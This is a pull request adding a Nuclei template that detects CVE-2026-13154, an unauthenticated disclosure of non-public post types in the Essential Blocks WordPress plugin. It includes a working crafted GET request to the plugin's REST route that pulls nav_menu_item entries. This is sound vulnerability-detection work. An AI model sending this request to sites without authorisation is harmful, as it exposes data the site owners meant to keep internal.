### PR TITLE
Add CVE-2026-13154 template

### DIFF
--- a/http/cves/2026/CVE-2026-13154.yaml
+++ b/http/cves/2026/CVE-2026-13154.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-13154
+
+info:
+  name: Essential Blocks < 6.4.0 - Unauthenticated Non-Public Post Type Disclosure
+  author: str4k3r
+  severity: medium
+  description: |
+    Essential Blocks < 6.4.0 contains a broken access control vulnerability
+    caused by the unauthenticated /wp-json/essential-blocks/v1/queries REST
+    route (Post Grid/Post Carousel block query handler) passing an
+    attacker-supplied source value straight into WP_Query without verifying
+    the requested post type is publicly viewable, letting unauthenticated
+    attackers read published entries of custom post types the site
+    registered as non-public. Fixed in 6.4.0, which falls back to the
+    default post type when the requested source is not publicly viewable.
+  impact: |
+    An unauthenticated visitor can read content from non-public post types
+    that the site intended to expose only to privileged users.
+  remediation: |
+    Upgrade Essential Blocks to version 6.4.0 or later.
+  impact: |
+    Unauthenticated attackers can read published content of custom post
+    types that were deliberately registered as non-public, exposing data
+    the site owner intended to keep internal.
+  remediation: Upgrade Essential Blocks to version 6.4.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-13154
+  classification:
+    cve-id: CVE-2026-13154
+    cwe-id: CWE-862
+    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wpdeveloper
+    product: essential-blocks
+  tags: cve,cve2026,wordpress,wp-plugin,essential-blocks,exposure,unauth,idor
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-json/essential-blocks/v1/queries?query_data=%7B%22source%22%3A%22nav_menu_item%22%2C%22per_page%22%3A5%7D&attributes=%7B%7D'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'data-id="'
+      - type: word
+        part: body
+        words:
+          - "ebpg-categories-meta"
+        negative: true

--- a/http/cves/2026/CVE-2026-13154.yaml
+++ b/http/cves/2026/CVE-2026-13154.yaml
@@ -14,11 +14,6 @@ info:
     registered as non-public. Fixed in 6.4.0, which falls back to the
     default post type when the requested source is not publicly viewable.
   impact: |
-    An unauthenticated visitor can read content from non-public post types
-    that the site intended to expose only to privileged users.
-  remediation: |
-    Upgrade Essential Blocks to version 6.4.0 or later.
-  impact: |
     Unauthenticated attackers can read published content of custom post
     types that were deliberately registered as non-public, exposing data
     the site owner intended to keep internal.


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-13154, an unauthenticated non-public post-type
disclosure in Essential Blocks before 6.4.0.

## Detection

The template sends one unauthenticated GET request to the generic
`/wp-json/essential-blocks/v1/queries` endpoint with `source=nav_menu_item`.
On vulnerable versions the route passes the requested post type to `WP_Query`
without checking whether it is publicly viewable, so a default block-theme
navigation resource can be returned to an anonymous caller. Fixed versions
fall back to a public post type instead.

The request is read-only, uses no credentials or callback infrastructure, and
does not create or modify WordPress content. Targets with no matching
navigation data correctly produce no finding.

## Validation

- Vulnerable official Essential Blocks 6.3.0: `DETECTED` 3/3
- Fixed official Essential Blocks 6.4.0: `NOT_DETECTED` 3/3
- Native Nuclei v3.11.0 template validation: passed
- V/F validation used official WordPress.org plugin packages and a disposable
  WordPress installation with the default navigation resource

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-13154